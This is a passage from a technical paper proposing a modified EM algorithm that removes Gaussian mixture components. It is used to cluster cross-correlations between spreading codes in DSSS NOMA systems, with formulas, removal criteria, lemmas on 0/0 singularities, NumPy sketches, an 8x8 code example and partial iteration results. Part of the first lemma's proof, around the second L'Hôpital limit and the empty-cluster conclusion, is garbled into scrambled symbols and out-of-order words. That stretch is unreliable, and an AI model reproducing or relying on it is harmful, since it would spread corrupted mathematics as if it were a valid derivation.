$$\gamma_{j,k}^{s-1} = \frac{\dfrac{\theta_k^{s-1}}{\sigma_k^{s-1}\sqrt{2\pi}} \exp\left(-\dfrac{\big(\tilde{r}_j - \mu_k^{s-1}\big)^2}{2\big(\sigma_k^{s-1}\big)^2}\right)}{\sum_{l=1}^{K} \dfrac{\theta_l^{s-1}}{\sigma_l^{s-1}\sqrt{2\pi}} \exp\left(-\dfrac{\big(\tilde{r}_j - \mu_l^{s-1}\big)^2}{2\big(\sigma_l^{s-1}\big)^2}\right)}. \qquad (5)$$

At the E-step, the number of elements $D_k^{s-1}$ which belong to the $k$-th component of a mixture is also evaluated using (6):

$$D_k^{s-1} = \sum_{j=1}^{D} \gamma_{j,k}^{s-1}. \qquad (6)$$
Maximization step (M-step), at which new estimates of the model parameters $\omega^s = \{\theta^s, \mu^s, \sigma^s\} = \{\theta_1^s, \ldots, \theta_K^s, \mu_1^s, \ldots, \mu_K^s, \sigma_1^s, \ldots, \sigma_K^s\}$ are estimated using (7) so that at the current $s$-th iteration they maximize $L(\omega|\tilde{r})$:

$$\theta_k^s = \frac{D_k^{s-1}}{D}; \qquad \mu_k^s = \frac{1}{D_k^{s-1}} \sum_{j=1}^{D} \gamma_{j,k}^{s-1}\, \tilde{r}_j; \qquad \big(\sigma_k^s\big)^2 = \frac{1}{D_k^{s-1}} \sum_{j=1}^{D} \gamma_{j,k}^{s-1} \big(\tilde{r}_j - \mu_k^s\big)^2. \qquad (7)$$
The stopping criterion for the EM-algorithm can be based on the condition $L(\omega^s|\tilde{r}) - L(\omega^{s-1}|\tilde{r}) < \varepsilon$, where $\varepsilon$ is a positive number at which the current accuracy of estimation of the model parameters can be considered suitable. The estimated parameters of the Gaussian mixture model (1) are $\hat{\omega} = \omega^{s_{\max}}$. The EM-algorithm and its modifications are used for estimating the parameters of components of mixtures, which are presented in the form of Gaussian mixture models and represent data to be analyzed in different applications. The algorithm also allows a clustering of objects, which are elements of the data to be analyzed, using the obtained posterior probabilities that a taken object belongs to some cluster (component of a Gaussian mixture model), but its standard realization is characterized by features that can limit its use:
1. Sensitivity to the initial parameters $\omega^0 = \{\theta^0, \mu^0, \sigma^0\}$, which can cause a solution in local extrema of the log-likelihood function $L(\omega|\tilde{r})$, which is maximized during the iterative procedures of the EM-algorithm.
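A compact sketch of one realization of the iterative procedure (5)–(7) with the stopping criterion above is given below; it is a plain NumPy restatement of the standard EM recursion, without the removal criteria introduced later, and all names are local to this example:

import numpy as np

def em_step(r, theta, mu, sigma):
    """One EM iteration: E-step (5)-(6) followed by M-step (7).

    Note: degenerate components (sigma -> 0) cause division by zero here;
    the paper handles them with the removal criteria of Sect. 2.3.
    """
    comp = (theta / (sigma * np.sqrt(2 * np.pi))
            * np.exp(-(r[:, None] - mu) ** 2 / (2 * sigma ** 2)))   # (D, K)
    gamma = comp / comp.sum(axis=1, keepdims=True)                  # posteriors (5)
    d_k = gamma.sum(axis=0)                                         # cluster sizes (6)
    theta = d_k / len(r)                                            # weights (7)
    mu = (gamma * r[:, None]).sum(axis=0) / d_k
    sigma = np.sqrt((gamma * (r[:, None] - mu) ** 2).sum(axis=0) / d_k)
    return theta, mu, sigma, gamma

def run_em(r, theta, mu, sigma, eps=1e-9, max_iter=100):
    """Iterate until the log-likelihood gain falls below eps."""
    prev = -np.inf
    for _ in range(max_iter):
        theta, mu, sigma, gamma = em_step(r, theta, mu, sigma)
        comp = (theta / (sigma * np.sqrt(2 * np.pi))
                * np.exp(-(r[:, None] - mu) ** 2 / (2 * sigma ** 2)))
        ll = np.log(comp.sum(axis=1)).sum()                         # (4)
        if ll - prev < eps:
            break
        prev = ll
    return theta, mu, sigma, gamma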
2. A priori uncertainty about the number of components of a mixture $K$ in different practical problems, e.g., if a clustering problem is characterized by a priori uncertainty about the number of clusters.
3. The need to introduce and use additional criteria for adding or removing components (clusters) in modifications of the EM-algorithm with adding or removing of components, which influences the probabilities of errors of the first and second kind during clustering.
4. The need to take into account the specific nature of the problem (i.e., context, physical meaning, etc.) for a correct interpretation of the obtained solutions.
5. Possible occurrence of singularities (indeterminate forms) during the iterative procedures of the EM-algorithm, which are subject to disclosure and contextual explanation, taking into account the specific nature of the problem, in order to provide a correct continuation of the iterative procedures of the EM-algorithm in these conditions.

The content of the parametric and criteria features based modification of the EM-algorithm with removing components of the Gaussian mixture model, which is proposed in the paper, boils down to:
1. Justification of the structural parameter $K$ and its variability.
2. Justification of the initial model parameters $\omega^0 = \{\theta^0, \mu^0, \sigma^0\}$.
3. Introduction and justification of additional clustering criteria for adjusting the procedures of the EM-algorithm under conditions of mathematical singularities in the log-likelihood function $L(\omega|\tilde{r})$, as well as taking into account the peculiarities of the context of element clustering.

2.1 Justification of the Structural Parameter K and Its Variability
Despite the fact that the EM-algorithm is a generally known method for estimating the parameters of distributions which form a mixture, and for clustering, one of the main problems in its practical use is a priori uncertainty about the number of components (clusters) $K$, which is a structural parameter of this algorithm. There are known modifications of the EM-algorithm with adding [22] or removing [19] of components. The choice of modification of the EM-algorithm significantly depends on the problem of a deep statistical analysis of cross-correlations between code structures in low power environment friendly DSSS NOMA communications, which can be characterized by an important feature: the number of elements in the mixture $\tilde{r}$ to be analyzed and clustered can in some cases be small ($D \sim 10 \ldots 100$), which is small enough to complicate the selection of some Gaussian components, even if they are present in an observed sample of the mixture. In order to sufficiently describe one, e.g., the $k$-th, Gaussian component, it is necessary to have in a mixture at least $D_k \approx 10$ elements which belong to this component, depending on its parameters $\mu_k$ and $\sigma_k^2$. Therefore, the use of approaches to the modification of the EM-algorithm which are characterized by an adding of components leads to the fact that a significant number or all elements of a mixture are identified with the same component (it depends also on the initial model parameters $\omega^0$), because one or two initial components during clustering can act as "attractors" of all elements of the mixture with a small sample size $D$. In this case, the process of adding components is significantly complicated by the need for a more complex justification of the criterion
of adding new components, which can be based on the rule $\forall k \in \overline{1, K}: \gamma_{j,k} < \gamma_0$, where $\gamma_0$ is the threshold value of the a posteriori probability that $\tilde{r}_j$ belongs to some component of the currently existing $K$ components of the mixture. In turn, there is a problem of choosing the threshold $\gamma_0$, which influences the probabilities of errors of the first and second kind during clustering. Therefore, for modifying the EM-algorithm according to the problem of a deep statistical analysis of cross-correlations between code structures in DSSS NOMA communications, an approach that boils down to removing components of the Gaussian mixture model has been chosen. In doing so, the modification is characterized by the structural parameter $K_{\max}$, which is the initial maximum possible number of components in the model. Given that the data $\tilde{r}$, which are cross-correlations between code structures, are the subject of analysis, it would be possible to choose the maximum possible number of components of the mixture $K_{\max} = D$. However, clustering in this case, depending on the initial model parameters $\omega^0$, can be reduced to the fact that there are $D$ clusters, each of which contains one or more (if their values are the same) cross-correlation coefficients $\tilde{r}_j$, $j = \overline{1, D}$; there will also be a number of empty clusters, since $K_{\max} = D$ while some clusters contain more than one object. The content and interpretation of such a clustering are trivial and show only that any two different code structures are in some way correlated with each other, which is known a priori, or that several different code structures are pairwise correlated in the same way with the same cross-correlation coefficient, and this fact can be determined by means of a simple analysis of $\tilde{r}$. In order to analyze the structure of different sets of cross-correlations between code structures, it is advisable to require that a cluster contain at least two elements; therefore, in the proposed parametric and criteria features based modification of the EM-algorithm with removing components of the Gaussian mixture model, the initial structural parameter $K_{\max} = D/2$ is chosen.

2.2 Justification of the Initial Model Parameters
It is expedient to choose an initial approximation in such a way as to ensure the maximum possible equidistance between Gaussian components in the range of all possible values of a cross-correlation coefficient in the general case, i.e., $-1 \leq \tilde{r} \leq 1$. This will ensure that the initial clusters cover uniformly the range of all possible values of $\tilde{r}$ during the analysis. The positions of the initial clusters are defined by $\mu^0$, which can be expressed from the condition of the maximum possible equidistance between $K$ clusters:
$$\mu_k^0 = -1 + k\,\Delta\mu - \frac{\Delta\mu}{2}, \quad k = \overline{1, K}, \qquad (8)$$

where $\Delta\mu = (\max \tilde{r} - \min \tilde{r})/K = 2/K$. The width of an initial cluster can be defined using the $3\sigma$ rule, according to which each initial cluster is characterized by the interval $\big[\mu_k^0 - 3\sigma_k^0;\ \mu_k^0 + 3\sigma_k^0\big]$.
Given the condition of the maximum possible equidistance between $K$ clusters and the $3\sigma$ rule for the width of an initial cluster, the value of $\sigma_k^0$ can be expressed as follows:

$$\sigma_k^0 = \frac{\max \tilde{r} - \min \tilde{r}}{6K} = \frac{1}{3K}, \quad k = \overline{1, K}. \qquad (9)$$
In the conditions of a priori uncertainty about the distribution of elements over the initial clusters, it is reasonable to assume that these elements are distributed uniformly among the $K$ clusters:

$$\theta_k^0 = \frac{1}{K}, \quad k = \overline{1, K}. \qquad (10)$$
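The initialization (8)–(10) is straightforward to express in code; the sketch below assumes the general range $[-1, 1]$ of a cross-correlation coefficient, as in the text:

import numpy as np

def initial_parameters(D):
    """Initial mixture parameters by (8)-(10) with K_max = D/2 components."""
    K = D // 2                              # initial structural parameter
    k = np.arange(1, K + 1)
    d_mu = 2.0 / K                          # Delta-mu for the range [-1, 1]
    mu0 = -1.0 + k * d_mu - d_mu / 2        # equidistant cluster centers (8)
    sigma0 = np.full(K, 1.0 / (3 * K))      # 3-sigma cluster width (9)
    theta0 = np.full(K, 1.0 / K)            # uniform weights (10)
    return theta0, mu0, sigma0

# For D = 28 (the example below): K = 14, mu_k = (2k - 15)/14, sigma_k = 1/42.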
The EM-algorithm will refine the initial model parameters $\omega^0 = \{\theta^0, \mu^0, \sigma^0\}$ so that each new $s$-th iteration allows obtaining a new refined approximation $\omega^s = \{\theta^s, \mu^s, \sigma^s\}$, which is more likely for the observed data $\tilde{r}$ than the approximations obtained in previous iterations (the log-likelihood function $L(\omega|\tilde{r})$ will be increasing at each iteration).

2.3 Introducing and Justification of Additional Clustering Criteria
Let us introduce and justify three additional clustering criteria for adjusting the procedures of the EM-algorithm under conditions of mathematical singularities (indeterminate forms) in the log-likelihood function $L(\omega|\tilde{r})$, as well as taking into account the peculiarities of the context of element clustering during a deep statistical analysis of cross-correlations between code structures in DSSS NOMA communications.

2.3.1 Criterion 1
The $k$-th cluster (Gaussian component) is empty (does not contain elements) and must be removed in further analysis when the $s$-th iteration of the EM-algorithm simultaneously meets the following conditions, which are interconnected through the a posteriori probabilities $\gamma_{j,k}^{s-1}$, $j = \overline{1, D}$ ($\gamma_{j,k}^{s-1} \to 0$ if the stringent conditions below are met):
1. $D_k^{s-1} \ll 1$ (stringent condition: $D_k^{s-1} = 0$); this is also a defining condition.
2. $\sigma_k^s \approx 0$ (stringent condition: $\sigma_k^s = 0$).
3. $\theta_k^s \ll 1/K$ (stringent condition: $\theta_k^s = 0$).

Note that in the practical implementation of the EM-algorithm, the stringent conditions of criterion 1 may not be achieved, because the estimated a posteriori probabilities $\gamma_{j,k}^{s-1}$, $j = \overline{1, D}$, for the $k$-th cluster, which does not contain elements, are not always exactly $\gamma_{j,k}^{s-1} = 0$, $j = \overline{1, D}$, and may only be close to these values, with estimates acceptable for decision making according to criterion 1, i.e., $\gamma_{j,k}^{s-1} \approx 0$, $j = \overline{1, D}$.

2.3.2 Criterion 2
The $k$-th cluster (Gaussian component) contains only one element and must be removed in further analysis, because this one selected element (cross-correlation coefficient) in the cluster is trivial (it is known a priori that any two different code structures are correlated with each other in some way; see also the justification of the structural parameter $K$ above), when the $s$-th iteration of the EM-algorithm simultaneously meets the following conditions:
1. $D_k^{s-1} \approx 1$ (stringent condition: $D_k^{s-1} = 1$); this is also a defining condition.
2. $\sigma_k^s \approx 0$ (stringent condition: $\sigma_k^s = 0$).

An element that is selected according to criterion 2 remains in the input data $\tilde{r}$ for a further analysis (further analysis takes place without the removed $k$-th cluster).

2.3.3 Criterion 3
The $k$-th cluster (Gaussian component) contains a number of identical elements when the $s$-th iteration of the EM-algorithm simultaneously meets the following conditions:
1. $D_k^{s-1} > 1$ (stringent condition: $D_k^{s-1} > 1$, $D_k^{s-1} \in \mathbb{Z}^{+}$); this is also a defining condition.
2. $\sigma_k^s \approx 0$ (stringent condition: $\sigma_k^s = 0$).

Code structures involved in the formation of elements that are selected according to criterion 3 are removed. Further analysis is performed for the input data $\tilde{r}$ that do not contain the removed code structures.

2.4 Analysis of Problems that are Associated with Introduced Criteria
The introduction of criteria 1–3 is related to the fact that for a certain $k$-th cluster $\sigma_k^s = 0$ holds under the stringent conditions considered above, which introduces into the EM-algorithm mathematical singularities (indeterminate forms) of the type $L(\omega^s|\tilde{r}) = 0/0$, as follows from the analysis of (1) and (4). The introduced criteria allow processing this specific mathematical singularity in the EM-algorithm and continuing the further statistical analysis with clustering of elements. The introduced criteria also explain the conditions that accompany the entry of the EM-algorithm into the specific mathematical singularity in the context of the problem of a deep statistical analysis of cross-correlations between code structures in DSSS NOMA communications. Let us prove two lemmas to justify criteria 1–3 from the standpoint of analysis of the formed mathematical singularities (indeterminate forms) of the type $L(\omega^s|\tilde{r}) = 0/0$ in the EM-algorithm.

2.4.1 A Lemma on the Mathematical Singularity in the EM-Algorithm that Occurs When the Stringent Conditions of the Criterion 1 Exist, and Its Context
Statement of the Lemma. Under the stringent conditions of criterion 1 at the $s$-th iteration of the EM-algorithm, the mathematical singularity (indeterminate form) of the
type $L(\omega^s|\tilde{r}) = 0/0$ can be processed in such a way that the value of the log-likelihood function $L(\omega^s|\tilde{r})$ equals the value which would be obtained without the empty $k$-th cluster.

Proof of the Lemma. Let us analyze the indeterminate form of the type $L(\omega^s|\tilde{r}) = 0/0$ for the general case of formation of the $k$-th empty cluster at the $s$-th iteration, i.e., at $\gamma_{j,k}^{s-1} \to 0$, $j = \overline{1, D}$, representing $\omega^s$ through $\gamma^{s-1}$ using (7):

$$\lim_{\substack{\gamma_{j,k}^{s-1} \to 0, \\ j = \overline{1, D}}} L(\omega^s|\tilde{r}) \equiv \lim_{\substack{\gamma_{j,k}^{s-1} \to 0, \\ j = \overline{1, D}}} \sum_{j=1}^{D} \ln \sum_{k=1}^{K} \frac{\theta_k^s}{\sigma_k^s \sqrt{2\pi}} \exp\left(-\frac{\big(\tilde{r}_j - \mu_k^s\big)^2}{2\big(\sigma_k^s\big)^2}\right)$$
$$= \lim_{\substack{\gamma_{j,k}^{s-1} \to 0, \\ j = \overline{1, D}}} \sum_{j=1}^{D} \ln \sum_{k=1}^{K} \left\{ \frac{\left(\sum_{p=1}^{D} \gamma_{p,k}^{s-1}\right)^{3/2}}{D \sqrt{2\pi \sum_{p=1}^{D} \gamma_{p,k}^{s-1} \big(\tilde{r}_p - \mu_k^s\big)^2}} \exp\left[-\frac{\big(\tilde{r}_j - \mu_k^s\big)^2 \sum_{p=1}^{D} \gamma_{p,k}^{s-1}}{2 \sum_{p=1}^{D} \gamma_{p,k}^{s-1} \big(\tilde{r}_p - \mu_k^s\big)^2}\right] \right\}. \qquad (11)$$

A limit for the term in (11) in a generalized form:

$$A_{j,k} = \lim_{\substack{\gamma_{j,k}^{s-1} \to 0, \\ j = \overline{1, D}}} \left\{ \frac{\left(\sum_{p=1}^{D} \gamma_{p,k}^{s-1}\right)^{3/2}}{D \sqrt{2\pi \sum_{p=1}^{D} \gamma_{p,k}^{s-1} \big(\tilde{r}_p - \mu_k^s\big)^2}} \exp\left[-\frac{\big(\tilde{r}_j - \mu_k^s\big)^2 \sum_{p=1}^{D} \gamma_{p,k}^{s-1}}{2 \sum_{p=1}^{D} \gamma_{p,k}^{s-1} \big(\tilde{r}_p - \mu_k^s\big)^2}\right] \right\}.$$

For convenience, the logarithm and the property of the limit of a continuous function can be used:

$$A_{j,k} = \exp\big(\ln A_{j,k}\big) = \exp\left( \lim_{\substack{\gamma_{j,k}^{s-1} \to 0, \\ j = \overline{1, D}}} \ln \left\{ \frac{\left(\sum_{p=1}^{D} \gamma_{p,k}^{s-1}\right)^{3/2}}{D \sqrt{2\pi \sum_{p=1}^{D} \gamma_{p,k}^{s-1} \big(\tilde{r}_p - \mu_k^s\big)^2}} \exp\left[-\frac{\big(\tilde{r}_j - \mu_k^s\big)^2 \sum_{p=1}^{D} \gamma_{p,k}^{s-1}}{2 \sum_{p=1}^{D} \gamma_{p,k}^{s-1} \big(\tilde{r}_p - \mu_k^s\big)^2}\right] \right\} \right)$$
$$= \exp\left( \lim_{\substack{\gamma_{j,k}^{s-1} \to 0, \\ j = \overline{1, D}}} \left[ \ln \frac{\left(\sum_{p=1}^{D} \gamma_{p,k}^{s-1}\right)^{3/2}}{\left(\sum_{p=1}^{D} \gamma_{p,k}^{s-1} \big(\tilde{r}_p - \mu_k^s\big)^2\right)^{1/2}} - \ln D - \frac{1}{2}\ln(2\pi) - \frac{\big(\tilde{r}_j - \mu_k^s\big)^2 \sum_{p=1}^{D} \gamma_{p,k}^{s-1}}{2 \sum_{p=1}^{D} \gamma_{p,k}^{s-1} \big(\tilde{r}_p - \mu_k^s\big)^2} \right] \right).$$

For $\lim_{\gamma_{j,k}^{s-1} \to 0,\ j = \overline{1, D}} \dfrac{\left(\sum_{p=1}^{D} \gamma_{p,k}^{s-1}\right)^{3/2}}{\left(\sum_{p=1}^{D} \gamma_{p,k}^{s-1} (\tilde{r}_p - \mu_k^s)^2\right)^{1/2}}$ the L'Hôpital's rule can be used, taking into account that for the $k$-th empty cluster $\tilde{r}_j - \mu_k^s \neq 0$, $j = \overline{1, D}$:

$$\lim_{\substack{\gamma_{j,k}^{s-1} \to 0, \\ j = \overline{1, D}}} \frac{\left(\sum_{p=1}^{D} \gamma_{p,k}^{s-1}\right)^{3/2}}{\left(\sum_{p=1}^{D} \gamma_{p,k}^{s-1} \big(\tilde{r}_p - \mu_k^s\big)^2\right)^{1/2}} = \lim_{\substack{\gamma_{j,k}^{s-1} \to 0, \\ j = \overline{1, D}}} \frac{\dfrac{\partial}{\partial \gamma_{j,k}^{s-1}} \left(\sum_{p=1}^{D} \gamma_{p,k}^{s-1}\right)^{3/2}}{\dfrac{\partial}{\partial \gamma_{j,k}^{s-1}} \left(\sum_{p=1}^{D} \gamma_{p,k}^{s-1} \big(\tilde{r}_p - \mu_k^s\big)^2\right)^{1/2}}$$
$$= \lim_{\substack{\gamma_{j,k}^{s-1} \to 0, \\ j = \overline{1, D}}} \frac{\tfrac{3}{2} \left(\sum_{p=1}^{D} \gamma_{p,k}^{s-1}\right)^{1/2}}{\tfrac{1}{2} \big(\tilde{r}_j - \mu_k^s\big)^2 \left(\sum_{p=1}^{D} \gamma_{p,k}^{s-1} \big(\tilde{r}_p - \mu_k^s\big)^2\right)^{-1/2}} = \lim_{\substack{\gamma_{j,k}^{s-1} \to 0, \\ j = \overline{1, D}}} \frac{3 \left(\sum_{p=1}^{D} \gamma_{p,k}^{s-1}\right)^{1/2} \left(\sum_{p=1}^{D} \gamma_{p,k}^{s-1} \big(\tilde{r}_p - \mu_k^s\big)^2\right)^{1/2}}{\big(\tilde{r}_j - \mu_k^s\big)^2} = 0.$$

For $\lim_{\gamma_{j,k}^{s-1} \to 0,\ j = \overline{1, D}} \dfrac{\big(\tilde{r}_j - \mu_k^s\big)^2 \sum_{p=1}^{D} \gamma_{p,k}^{s-1}}{2 \sum_{p=1}^{D} \gamma_{p,k}^{s-1} \big(\tilde{r}_p - \mu_k^s\big)^2}$ the L'Hôpital's rule can also be used:
23
* + s 2 D s−1 s 2 r˜j − μk s−1 p=1 γp,k r˜j − μk ∂γj,k 1 * = lim 2 = . 2 + = s−1 2 s s−1 s ∂ γj,k → 0, s−1 2 r˜j − μk 2 D r˜p − μk p=1 γp,k ∂γj,k j = 1, D ∂
Given this
⎛
⎜ ⎜ lim ⎜ln ( s−1 ⎝ D → 0, γ j,k
j = 1, D
s 2 D s−1 r˜j − μk p=1 γp,k − )1/2 s−1 s 2 s−1 s 2 r˜p − μk 2 D p=1 γp,k r˜p − μ γ s−1 3/2 D γ p=1 p,k
p=1 p,k
k
) 1 −lnD − ln(2π) = −∞. 2
Taking this into account, Aj,k = exp lnAj,k = exp(−∞) = 0, j = 1, D, for some k-th empty cluster. Thus, a formation of empty and the related mathematical
clusters r = 0/0 may be possible during singularity (indeterminate form) of the type L ωs | a deep statistical analysis of cross-correlations between code structures, when using the proposed parametric and criteria features based modification of the EM-algorithm with removing components of the Gaussian mixture model. This indeterminate form can be processed in such a way that for some k-th empty cluster, which is identified s s using the criterion 1, a related k-th degenerate (σk → 0, θk → 0) component of the Gaussian mixture model at the s-th iteration of the EM-algorithm must be removed
from r the structure of the log-likelihood function L(ω| r). In doing so, the value of L ωs | equals to the value, which would be without an empty k-th cluster (Gaussian component in the mixture) due to the fact that for this cluster Aj,k = 0, j = 1, D. 2.4.2 A Lemma on the Mathematical Singularity in the EM-Algorithm that Occurs When the Stringent Conditions of Criteria 2 or 3 Exist, and Its Context Statement of the Lemma. Under the stringent conditions of criteria
2 or 3 at the $s$-th iteration of the EM-algorithm, the indeterminate form of the type $L(\omega^s|\tilde{r}) = 0/0$ can be processed in such a way that $L(\omega^s|\tilde{r}) \to \infty$, and the related $k$-th cluster contains only one element or several elements which are the same.

Proof of the Lemma. Suppose that the $k$-th degenerate component $N(\tilde{r}; \mu_k, 0)$ of the Gaussian mixture model is identified, and it contains only one element (in the case of criterion 2) or several elements which are the same (in the case of criterion 3) from the input data $\tilde{r}$. Then these elements are equal to their mean value $\mu_k$, and the probability density function $p(\tilde{r}) = \frac{1}{\sigma_k\sqrt{2\pi}} \exp\left(-\frac{(\tilde{r} - \mu_k)^2}{2\sigma_k^2}\right)$ will degenerate into the Dirac delta function $p(\tilde{r}\,|\,\sigma_k^2 \to 0) = \delta(\tilde{r} - \mu_k)$ in this case. Such an unbounded $\delta(\tilde{r} - \mu_k)$ is a part of $L(\omega|\tilde{r})$ as a degenerate $k$-th Gaussian component. Inserting the values (or the one value) $\tilde{r}_j = \mu_k$, which belong to the $k$-th cluster, into $L(\omega^s|\tilde{r})$ leads to $L(\omega^s|\tilde{r}) \to \infty$.
Thus, a formation of clusters that contain only one element or several identical elements, and the related mathematical singularities (indeterminate forms) in $L(\omega^s|\tilde{r})$, may be possible during a deep statistical analysis of cross-correlations between code structures, when using the proposed parametric and criteria features based modification of the EM-algorithm with removing components of the Gaussian mixture model. These indeterminate forms can be processed in such a way that for some $k$-th cluster, which is identified using criteria 2 or 3, the related $k$-th degenerate ($\sigma_k^s \to 0$) component of the Gaussian mixture model at the $s$-th iteration of the EM-algorithm must be removed from the structure of the log-likelihood function $L(\omega|\tilde{r})$. In doing so, the $k$-th cluster contains elements which are related to a set of code structures that are equally correlated with each other.
3 Experiments
Let us consider an example of a deep statistical analysis of cross-correlations between code structures using the proposed modification of the EM-algorithm with removing components of the Gaussian mixture model and the additional clustering criteria. Let the codes for a DSSS NOMA communication system be presented by the matrix $S$:

$$S = \begin{pmatrix} +1 & +1 & +1 & +1 & +1 & +1 & +1 & +1 \\ +1 & -1 & +1 & -1 & -1 & -1 & +1 & -1 \\ +1 & +1 & -1 & -1 & +1 & -1 & -1 & -1 \\ +1 & -1 & -1 & +1 & +1 & -1 & -1 & +1 \\ +1 & +1 & +1 & +1 & -1 & +1 & +1 & +1 \\ +1 & -1 & +1 & -1 & -1 & +1 & -1 & +1 \\ +1 & +1 & -1 & -1 & -1 & -1 & +1 & +1 \\ +1 & +1 & -1 & +1 & +1 & +1 & +1 & +1 \end{pmatrix},$$

where each code is $S_{m,i}$, $m = \overline{1, Q}$, $i = \overline{1, N}$, and $N$ is the code length. Note that in the example $Q = 8$ and $N = 8$; however, in low power environment friendly DSSS NOMA communications $N \gg 1$ and typically $N > Q$. The correlation matrix for the codes contains the cross-correlation coefficients $R_{m,n} = \frac{1}{N}\sum_{i=1}^{N} S_{m,i} S_{n,i}$, $m = \overline{1, Q}$, $n = \overline{1, Q}$. For the considered codes $S$ the correlation matrix $R$ is presented in (12). In the considered example $R$ contains a limited set of values $R \in \{0, \pm\frac{1}{4}, \pm\frac{1}{2}, \frac{3}{4}\}$ (and the trivial $R_{m,m} = 1$, $m = \overline{1, Q}$, which corresponds to the main diagonal of the correlation matrix); in low power DSSS NOMA communications this set can be much more diverse, especially at $Q \gg 1$. A mixture of estimated unique and informative cross-correlations (below the main diagonal of the correlation matrix) is $\tilde{r} = \{\tilde{r}_j\}$, $j = \overline{1, D}$, $D = 28$:

$$\tilde{r} = \big(R_{2,1}, R_{3,1}, R_{3,2}, R_{4,1}, R_{4,2}, R_{4,3}, R_{5,1}, R_{5,2}, R_{5,3}, R_{5,4}, R_{6,1}, R_{6,2}, R_{6,3}, R_{6,4}, R_{6,5}, R_{7,1}, R_{7,2}, R_{7,3}, R_{7,4}, R_{7,5}, R_{7,6}, R_{8,1}, R_{8,2}, R_{8,3}, R_{8,4}, R_{8,5}, R_{8,6}, R_{8,7}\big)$$
$$= \big(-\tfrac{1}{4}, -\tfrac{1}{4}, 0, 0, -\tfrac{1}{4}, +\tfrac{1}{4}, \tfrac{3}{4}, 0, -\tfrac{1}{2}, -\tfrac{1}{4}, 0, +\tfrac{1}{4}, -\tfrac{1}{4}, 0, +\tfrac{1}{4}, 0, +\tfrac{1}{4}, +\tfrac{1}{4}, 0, +\tfrac{1}{4}, 0, +\tfrac{3}{4}, -\tfrac{1}{2}, 0, +\tfrac{1}{4}, +\tfrac{1}{2}, -\tfrac{1}{4}, +\tfrac{1}{4}\big);$$

$$R = \begin{pmatrix} +1 & -\frac{1}{4} & -\frac{1}{4} & 0 & +\frac{3}{4} & 0 & 0 & +\frac{3}{4} \\ -\frac{1}{4} & +1 & 0 & -\frac{1}{4} & 0 & +\frac{1}{4} & +\frac{1}{4} & -\frac{1}{2} \\ -\frac{1}{4} & 0 & +1 & +\frac{1}{4} & -\frac{1}{2} & -\frac{1}{4} & +\frac{1}{4} & 0 \\ 0 & -\frac{1}{4} & +\frac{1}{4} & +1 & -\frac{1}{4} & 0 & 0 & +\frac{1}{4} \\ +\frac{3}{4} & 0 & -\frac{1}{2} & -\frac{1}{4} & +1 & +\frac{1}{4} & +\frac{1}{4} & +\frac{1}{2} \\ 0 & +\frac{1}{4} & -\frac{1}{4} & 0 & +\frac{1}{4} & +1 & 0 & -\frac{1}{4} \\ 0 & +\frac{1}{4} & +\frac{1}{4} & 0 & +\frac{1}{4} & 0 & +1 & +\frac{1}{4} \\ +\frac{3}{4} & -\frac{1}{2} & 0 & +\frac{1}{4} & +\frac{1}{2} & -\frac{1}{4} & +\frac{1}{4} & +1 \end{pmatrix}. \qquad (12)$$
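The correlation matrix (12) and the mixture $\tilde{r}$ can be reproduced directly from $S$; the following short NumPy check is a sanity test, not part of the proposed technique:

import numpy as np

S = np.array([
    [+1, +1, +1, +1, +1, +1, +1, +1],
    [+1, -1, +1, -1, -1, -1, +1, -1],
    [+1, +1, -1, -1, +1, -1, -1, -1],
    [+1, -1, -1, +1, +1, -1, -1, +1],
    [+1, +1, +1, +1, -1, +1, +1, +1],
    [+1, -1, +1, -1, -1, +1, -1, +1],
    [+1, +1, -1, -1, -1, -1, +1, +1],
    [+1, +1, -1, +1, +1, +1, +1, +1],
])

N = S.shape[1]
R = S @ S.T / N                       # cross-correlation coefficients R_{m,n}
r = R[np.tril_indices(len(S), k=-1)]  # D = 28 elements below the main diagonal
print(sorted(set(r)))                 # -1/2, -1/4, 0, +1/4, +1/2, +3/4

Note that np.tril_indices enumerates the sub-diagonal elements row by row, which matches the ordering $R_{2,1}, R_{3,1}, R_{3,2}, R_{4,1}, \ldots$ used in the text.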
4 Results
Simulation results, which have been obtained using the proposed modification of the EM-algorithm, are presented below.
1. The initial number of clusters (the initial structural parameter of the model) is $K = D/2 = 14$.
2. The initial model parameters $\omega^0 = \{\theta^0, \mu^0, \sigma^0\}$ obtained using (8)–(10) are: $\mu_k^0 = (-15 + 2k)/14$, $\sigma_k^0 = 1/42$, $\theta_k^0 = 1/14$, $k = 1, 2, \ldots, 14$.
3. Iteration $s = 1$, the E-step: $L(\omega^0|\tilde{r}) = -47.229$; $D^0 = \big(0,\ 0,\ 3\cdot 10^{-8},\ 2,\ 7.4\cdot 10^{-4},\ 6,\ 4.5,\ 4.5,\ 8,\ 9.9\cdot 10^{-4},\ 1,\ 2.5\cdot 10^{-4},\ 2,\ 3.8\cdot 10^{-12}\big)$.
4. Iteration $s = 1$, the M-step:
$\theta^1 = \big(0,\ 0,\ 1.09\cdot 10^{-9},\ 0.07,\ 2.64\cdot 10^{-5},\ 0.21,\ 0.16,\ 0.16,\ 0.29,\ 3.53\cdot 10^{-5},\ 0.04,\ 8.81\cdot 10^{-6},\ 0.07,\ 1.34\cdot 10^{-13}\big)$;
$\mu^1 = \big(-0.5,\ -0.5,\ -0.5,\ -0.5,\ -0.25,\ -0.25,\ -6.3\cdot 10^{-13},\ 8.4\cdot 10^{-13},\ 0.25,\ 0.25,\ 0.5,\ 0.75,\ 0.75,\ 0.75\big)$;
$\sigma^1 = \big(0,\ 0,\ 0,\ 8.1\cdot 10^{-13},\ 1.6\cdot 10^{-3},\ 3.3\cdot 10^{-9},\ 4\cdot 10^{-7},\ 4.6\cdot 10^{-7},\ 2.9\cdot 10^{-9},\ 9.8\cdot 10^{-4},\ 1.5\cdot 10^{-12},\ 2\cdot 10^{-3},\ 0,\ 0\big)$.
5. Iteration $s = 2$, the E-step: $L(\omega^1|\tilde{r}) = 531.91$; $D^1 = \big(0,\ 3.4\cdot 10^{-10},\ 2,\ 2.7\cdot 10^{-6},\ 1.5\cdot 10^{-9},\ 6,\ 4.8,\ 4.2,\ 8,\ 2.9\cdot 10^{-9},\ 1,\ 0,\ 4.9\cdot 10^{-3},\ 2\big)$.
6. Iteration $s = 2$, the M-step:
$\theta^2 = \big(0,\ 1.2\cdot 10^{-11},\ 0.07,\ 9.8\cdot 10^{-8},\ 5.4\cdot 10^{-11},\ 0.21,\ 0.17,\ 0.15,\ 0.29,\ 10^{-10},\ 0.04,\ 0,\ 1.8\cdot 10^{-4},\ 0.07\big)$;
